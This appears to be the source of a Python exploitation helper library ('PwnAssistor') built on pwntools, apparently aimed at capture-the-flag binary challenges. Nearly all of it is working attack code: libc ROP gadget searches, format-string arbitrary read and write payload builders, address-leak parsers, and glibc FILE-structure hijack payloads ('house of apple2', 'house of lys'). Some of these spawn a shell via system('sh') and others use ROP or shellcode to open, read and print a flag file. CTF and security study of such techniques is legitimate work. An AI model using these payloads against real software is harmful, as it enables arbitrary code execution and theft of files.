from pwn import asm
import PwnAssistor.attacker.pwnvar as pwnvar


def get_magic_gadget1():
    return pwnvar.pwnlibc.search(
        asm("mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]",
            arch="amd64")).__next__()


def get_magic_gadget2():
    return pwnvar.pwnlibc.search(asm("mov rsp, rdx; ret", arch="amd64"), executable=True).__next__()


def get_magic_gadget3():
    return pwnvar.pwnlibc.search(asm('add rsp, 0x30; mov rax, r12; pop r12; ret', arch="amd64"),
                                 executable=True).__next__()


def get_pop_rdi():
    return pwnvar.pwnlibc.search(asm("pop rdi; ret", arch="amd64"), executable=True).__next__()


def get_pop_rsi():
    return pwnvar.pwnlibc.search(asm("pop rsi; ret", arch="amd64"), executable=True).__next__()


def get_pop_rax():
    return pwnvar.pwnlibc.search(asm("pop rax; ret", arch="amd64"), executable=True).__next__()


def get_ret():
    return pwnvar.pwnlibc.search(asm("ret", arch="amd64"), executable=True).__next__()


def get_pop_rdx_r12():
    return pwnvar.pwnlibc.search(asm("pop rdx; pop r12; ret", arch="amd64"), executable=True).__next__()


def get_syscall():
    return pwnvar.pwnlibc.search(asm("syscall; ret", arch="amd64"), executable=True).__next__()



from pwn import p64


def __fmt_write_single_byte(offset: int, value: int):
    if value > 255 or value < 0:
        raise Exception("target num is too big or too small for single byte")
    payload = b""
    if value != 0:
        payload += f"%{value}c".encode()
    payload += f"%{offset}$hhn".encode()

    return payload


def __get_num_list(value, is_zxt: bool, zxt_len: int):
    now_num = value
    num_list = []
    if now_num < 0 or now_num > 0xffffffffffffffff:
        raise Exception("target_num is too large or too small")

    if now_num == 0:
        num_list.append(0)
    while now_num != 0:
        num_list.append(now_num % 0x100)
        now_num //= 0x100
    if is_zxt:
        list_len = len(num_list)
        for i in range(zxt_len - list_len):
            num_list.append(0)

    return num_list


def fmt_64_write(input_offset: int,
                 target_addr: int,
                 target_num: int,
                 is_zxt: bool = False,
                 zxt_len: int = 8):
    """
    | input_offset:  the offset of input fmt str
    | target_addr:   the address to write
    | target_num:    the value to write
    | is_zxt:        zero extension or not
    | zxt_len:       zero extension to 'zxt_len' bit
    """
    # get the list with bytes num
    num_list = __get_num_list(target_num, is_zxt, zxt_len)

    payload = b""
    sum_num = 0
    tmp_len = 0xc * len(num_list)
    if tmp_len % 8 != 0:
        tmp_len += 4
    tmp_i = 0
    for i in sorted(num_list):
        if i - sum_num != 0:
            payload += b"%" + str(i - sum_num).encode() + b"c%" + str(
                tmp_len // 8 + input_offset + tmp_i).encode() + b"$hhn"
            sum_num = i
        else:
            payload += b"%" + str(tmp_len // 8 + input_offset + tmp_i).encode() + b"$hhn"
        tmp_i += 1
    payload = payload.ljust(tmp_len, b'a')

    no_repeat_list = list(set(num_list))
    for i in sorted(no_repeat_list):
        idx_list = [j for j, x in enumerate(num_list) if x == i]
        for j in idx_list:
            payload += p64(target_addr + j)

    return payload


def fmt_64_write_n(input_offset: int,
                   target_addr: int,
                   target_num: int,
                   is_zxt: bool = False,
                   zxt_len: int = 8):
    num_list = __get_num_list(target_num, is_zxt, zxt_len)

    payloads = []
    for i in range(len(num_list)):
        payloads.append(fmt_64_write(input_offset, target_addr + i, num_list[i]))
    return payloads


def fmt_64_read(input_offset: int, target_addr):
    payload = f"%{input_offset + 1}s".ljust(0x8, 'a').encode()
    payload += p64(target_addr)
    return payload


def fmt_not_on_stack_64_write(off_of_3: int, 
                              chain_ptr: tuple, 
                              target_addr: int, 
                              target_num: int, 
                              is_zxt: bool = False, 
                              zxt_len: int = 8):
    """
    :param off_of_3:     the offset of ptr3
    :param chain_ptr:    the stack chain ptr (ptr1, ptr2, ptr3)
    :param target_addr:  the address to write
    :param target_num:   the value to write
    :param is_zxt:       zero extension or not
    :param zxt_len:      zero extension to 'zxt_len' bit
    :return: payloads
    """
    off_1_ptr = chain_ptr[2] - off_of_3 * 8
    low_byte = chain_ptr[2] % 0x100

    offset_1 = (chain_ptr[0] - off_1_ptr) // 8
    offset_2 = (chain_ptr[1] - off_1_ptr) // 8
    offset_3 = (chain_ptr[2] - off_1_ptr) // 8

    num_list_addr = __get_num_list(target_addr, False, 8)
    num_list_value = __get_num_list(target_num, is_zxt, zxt_len)

    payloads = []
    for i in range(1, len(num_list_addr)):
        payload = __fmt_write_single_byte(offset_1, low_byte + i)
        payloads.append(payload)
        payload = __fmt_write_single_byte(offset_2, num_list_addr[i])
        payloads.append(payload)

    payload = __fmt_write_single_byte(offset_1, low_byte)
    payloads.append(payload)

    for i in range(len(num_list_value)):
        payload = __fmt_write_single_byte(offset_2, num_list_addr[0] + i)
        payloads.append(payload)
        payload = __fmt_write_single_byte(offset_3, num_list_value[i])
        payloads.append(payload)

    return payloads


def fmt_not_on_stack_64_read(off_of_3: int, chain_ptr: tuple, target_addr: int):
    off_1_ptr = chain_ptr[2] - off_of_3 * 8
    low_byte = chain_ptr[2] % 0x100

    offset_1 = (chain_ptr[0] - off_1_ptr) // 8
    offset_2 = (chain_ptr[1] - off_1_ptr) // 8
    offset_3 = (chain_ptr[2] - off_1_ptr) // 8

    num_list_addr = __get_num_list(target_addr, False, 8)
    # num_list_value = __get_num_list(target_num, is_zxt, zxt_len)
    payloads = []
    for i in range(len(num_list_addr)):
        payload = __fmt_write_single_byte(offset_1, low_byte + i)
        payloads.append(payload)
        payload = __fmt_write_single_byte(offset_2, num_list_addr[i])
        payloads.append(payload)

    payload = f"%{offset_3}$s".encode()
    payloads.append(payload)

    return payloads



from pwn import tubes, log, u64


def recv_bytes_addr(p, offset: int, terminator: bytes, leak_type: str):
    leak = u64(p.recvuntil(terminator)[-6:]+b'\x00\x00') - offset
    log.success(f'{leak_type} leak: {str(leak)}')
    return leak


def recv_heap_addr(p, offset: int):
    return recv_bytes_addr(p, offset, terminator=b'\x55', leak_type='heap')


def recv_libc_addr(p, offset: int):
    return recv_bytes_addr(p, offset, terminator=b'\x7f', leak_type='libc')




from pwn import p64, flat
import struct
from PwnAssistor.attacker.gadget import *
import PwnAssistor.attacker.pwnvar as pwnvar


def house_of_apple2(target_addr: int):
    jumps = pwnvar.pwnlibc.sym['_IO_wfile_jumps']
    system = pwnvar.pwnlibc.sym['system']
    wide_addr = target_addr
    vtable_addr = target_addr
    payload = b'    sh'.ljust(8, b'\x00')
    payload = payload.ljust(0x28, b'\x00')
    payload += p64(1)
    payload = payload.ljust(0x68, b'\x00')
    payload += p64(system)
    payload = payload.ljust(0xa0, b'\x00')
    payload += p64(wide_addr)
    payload = payload.ljust(0xd8, b'\x00')
    payload += p64(jumps)
    payload = payload.ljust(0xe0, b'\x00')
    payload += p64(vtable_addr)
    return payload


def stack_pivot_orw_by_shellcode(target_addr: int, file_name: bytes = b'flag'):
    shellcode = """
    xor rdx,rdx
    mov dh, 0x2
    mov rdi,{}
    xor esi,esi  
    mov eax,2
    syscall
    mov rsi,rdi
    mov edi,eax
    xor eax,eax
    syscall
    xor edi,2
    mov eax,edi
    syscall
    """.format(hex(target_addr + 0xb0))

    heap_first = target_addr
    setcontext = pwnvar.pwnlibc.sym['setcontext'] + 61
    mprotect_addr = pwnvar.pwnlibc.sym['mprotect']
    payload = p64(heap_first + 0x28) + p64(heap_first)
    payload = payload.ljust(0x20, b'\x00') + p64(setcontext)
    payload += asm(shellcode)
    payload = payload.ljust(0x68, b'\x00') + p64(heap_first & 0xfffffffffffff000)
    payload = payload.ljust(0x70, b'\x00') + p64(0x2000)
    payload = payload.ljust(0x88, b'\x00') + p64(7)
    payload = payload.ljust(0xa0, b'\x00') + p64(heap_first)
    payload = payload.ljust(0xa8, b'\x00') + p64(mprotect_addr)
    payload += file_name + b'\x00'
    return payload


def house_of_apple2_orw(target_addr: int, file_name: bytes = b'flag', mode: str = 'shellcode'):
    jumps = pwnvar.pwnlibc.sym['_IO_wfile_jumps']
    wide_addr = target_addr
    vtable_addr = target_addr
    magic = get_magic_gadget1()
    payload = p64(0) + p64(target_addr + 0x100 - 0x20)
    payload = payload.ljust(0x28, b'\x00')
    payload += p64(1)
    payload = payload.ljust(0x68, b'\x00')
    payload += p64(magic)
    payload = payload.ljust(0xa0, b'\x00')
    payload += p64(wide_addr)
    payload = payload.ljust(0xd8, b'\x00')
    payload += p64(jumps)
    payload = payload.ljust(0xe0, b'\x00')
    payload += p64(vtable_addr)
    payload = payload.ljust(0x100, b'\x00')
    if mode == 'shellcode':
        tmp = stack_pivot_orw_by_shellcode(target_addr + 0xe0, file_name)
    else:
        tmp = stack_pivot_orw_by_rop(target_addr + 0xe0, file_name)
    tmp = tmp[0x20:]
    payload += tmp

    return payload


def stack_pivot_orw_by_rop(target_addr: int, file_name: bytes = b'flag'):
    pop_rdi_addr = get_pop_rdi()
    pop_rsi_addr = get_pop_rsi()
    pop_rdx_r12_addr = get_pop_rdx_r12()  # pop_rdx_r12_ret
    pop_rax_addr = get_pop_rax()
    syscall_addr = get_syscall()
    ret_addr = get_ret()
    magic_addr = get_magic_gadget1()
    setcontext_addr = pwnvar.pwnlibc.sym['setcontext'] + 61
    flag_addr = target_addr + 0xe0

    payload = p64(0) + p64(target_addr) + p64(0) * 2 + p64(setcontext_addr)
    payload += p64(pop_rdi_addr) + p64(flag_addr) + p64(pop_rsi_addr) + p64(0)
    payload += p64(pop_rax_addr) + p64(2) + p64(syscall_addr)  # open
    payload += p64(pop_rdi_addr) + p64(3) + p64(pop_rsi_addr) + p64(flag_addr + 0x10) + p64(pop_rax_addr) + p64(0)
    payload += p64(pop_rdx_r12_addr) + p64(0x70) + p64(target_addr + 0x28) + p64(ret_addr) + p64(
        syscall_addr)  # read
    payload += p64(pop_rdi_addr) + p64(1) + p64(pop_rax_addr) + p64(1) + p64(syscall_addr)  # write
    payload += file_name + b'\x00'
    return magic_addr, payload


def house_of_lys(target_addr: int):
    payload = flat(
        {
            0x18: 1,
            0x20: 0,
            0x28: 1,
            0x30: 0,
            0x38: pwnvar.pwnlibc.sym["system"],
            0x48: target_addr + 0xa0,
            0x50: 1,
            0xa0: 0x68732f6e69622f,
            0xd8: get_IO_obstack_Jumps() + 0x20,
            0xe0: target_addr
        },
        filler='\x00'
    )
    return payload


def house_of_lys_orw(target_addr: int, file_name: bytes = b'flag'):
    gg1 = get_magic_gadget1()
    gg2 = get_magic_gadget2()
    gg3 = get_magic_gadget3()

    pop_rdi_addr = get_pop_rdi()
    pop_rsi_addr = get_pop_rsi()
    pop_rdx_r12_addr = get_pop_rdx_r12()  # pop_rdx_r12_ret
    pop_rax_addr = get_pop_rax()
    syscall_addr = get_syscall()
    ret_addr = get_ret()

    rop_payload = p64(pop_rdi_addr) + p64(target_addr + 0xa0) + p64(pop_rsi_addr) + p64(0)
    rop_payload += p64(pop_rax_addr) + p64(2) + p64(syscall_addr)  # open
    rop_payload += p64(pop_rdi_addr) + p64(3) + p64(pop_rsi_addr) + p64(target_addr + 0xa0) + p64(
        pop_rax_addr) + p64(0)
    rop_payload += p64(pop_rdx_r12_addr) + p64(0x70) + p64(target_addr + 0x28) + p64(ret_addr) + p64(
        syscall_addr)  # read
    rop_payload += p64(pop_rdi_addr) + p64(1) + p64(pop_rax_addr) + p64(1) + p64(syscall_addr)  # write

    payload = flat(
        {
            0x18: 1,
            0x20: 0,
            0x28: 1,
            0x30: 0,
            0x38: gg1,
            0x48: target_addr + 0xe8,
            0x50: 1,
            0xa0: file_name,
            0xd8: get_IO_obstack_Jumps() + 0x20,
            0xe0: target_addr,
            0xe8: {
                0x0: gg3,
                0x8: target_addr + 0xe8,  # Maybe sometimes you need to replace this address
                0x20: gg2,
                0x40: rop_payload
            }
        },
        filler='\x00'
    )
    return payload

def get_IO_obstack_Jumps():
    for i in pwnvar.pwnlibc.sections:
        if i.name == "__libc_IO_vtables":
            mem = pwnvar.pwnlibc.mmap
            pos = i.header.sh_offset
            with mem:
                for offset in range(0, 0x1000, 8):
                    value = []
                    for j in range(5):
                        value.append(struct.unpack('Q', mem[pos+offset+j*8:pos+offset+j*8+0x8])[0])
                    if value[0] != 0 and value[4] != 0 and value[1] == value[2] == value[3] == 0:
                        return offset+i.header.sh_addr+pwnvar.pwnlibc.address-0x18
    raise Exception("Not found IO_obstack_Jumps")


from setuptools import setup, find_packages

setup(
    name="PwnAssistor",
    version="0.1.5",
    description="Atool for pwn",
    author="V3rdant",
    license="MIT",
    packages=find_packages(),
    requires=['pwntools'],
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)